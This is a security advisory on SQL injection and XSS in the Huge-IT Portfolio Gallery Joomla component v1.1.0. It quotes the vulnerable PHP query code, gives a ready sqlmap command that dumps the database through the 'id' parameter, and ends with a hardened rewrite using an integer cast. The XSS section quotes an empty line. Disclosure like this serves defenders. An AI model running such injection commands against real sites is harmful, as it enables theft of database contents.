Title:Huge-IT Portfolio Gallery manager v1.1.0 SQL Injection and XSS
Both issues are post-authentication: the attacker must be logged in with at least Manager level access, or otherwise have access to the administrative panel, to reach the vulnerable code.

XSS at line 156 of ./administrator/components/com_portfoliogallery/views/video/tmpl/default.php:

155                         


In file administrator/components/com_portfoliogallery/models/portfoliogallery.php, the request variable id is read into $id_cat and concatenated without any sanitization into the SQL query being built starting at line 53:

 50     public function getPropertie() {
 51         $db = JFactory::getDBO();
 52         $id_cat = JRequest::getVar('id');
 53         $query = $db->getQuery(true);
 54         $query->select('#__huge_itportfolio_images.name as name,'
 55                 . '#__huge_itportfolio_images.id ,'
 56                 . '#__huge_itportfolio_portfolios.name as portName,'
 57                 . 'portfolio_id,#__huge_itportfolio_images.category as category, #__huge_itportfolio_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itportfolio_images.ordering,#__huge_itportfolio_images.published,published_in_sl_width');
 58         $query->from(array('#__huge_itportfolio_portfolios' => '#__huge_itportfolio_portfolios', '#__huge_itportfolio_images' => '#__huge_itportfolio_images'));
 59         $query->where('#__huge_itportfolio_portfolios.id = portfolio_id')->where('portfolio_id=' . $id_cat);
 60         $query->order('ordering asc');
 61         $db->setQuery($query);
 62         $results = $db->loadObjectList();
 63         return $results;

sqlmap  --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_portfoliogallery&view=portfoliogallery&id=*" --dbms mysql --dump
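A hardened rewrite of the query above, added here as an example and not the vendor's patch: the id parameter is forced to an integer before it is interpolated into the SQL text. It assumes the Joomla 2.5/3.x API the component already relies on; the function name getPropertieHardened and its $db/$input parameters are hypothetical, chosen so the body can be read outside the model class.

```php
<?php
// Added example (not the vendor's code). Assumes Joomla 2.5/3.x
// (JInput, JDatabaseDriver, JDatabaseQuery). The function name and the
// $db/$input parameters are hypothetical; inside the model this body
// would replace getPropertie(), with $input = JFactory::getApplication()->input.

function getPropertieHardened(JDatabaseDriver $db, JInput $input)
{
    // getInt() runs the raw request value through Joomla's INT filter:
    // a non-numeric value becomes 0 (or its leading digits), so no
    // attacker-controlled string survives to the concatenation below.
    $id_cat = $input->getInt('id', 0);

    $query = $db->getQuery(true);
    $query->select('#__huge_itportfolio_images.name as name,'
            . '#__huge_itportfolio_images.id,'
            . '#__huge_itportfolio_portfolios.name as portName,'
            . 'portfolio_id, #__huge_itportfolio_images.category as category,'
            . '#__huge_itportfolio_images.description as description,'
            . 'image_url, sl_url, sl_type, link_target,'
            . '#__huge_itportfolio_images.ordering,'
            . '#__huge_itportfolio_images.published, published_in_sl_width');
    $query->from(array(
        '#__huge_itportfolio_portfolios' => '#__huge_itportfolio_portfolios',
        '#__huge_itportfolio_images'     => '#__huge_itportfolio_images',
    ));
    $query->where('#__huge_itportfolio_portfolios.id = portfolio_id');
    // Explicit (int) cast at the interpolation point: the value is already
    // an integer, and the cast documents that only a number can appear here.
    $query->where('portfolio_id = ' . (int) $id_cat);
    $query->order('ordering ASC');

    $db->setQuery($query);
    return $db->loadObjectList();
}
```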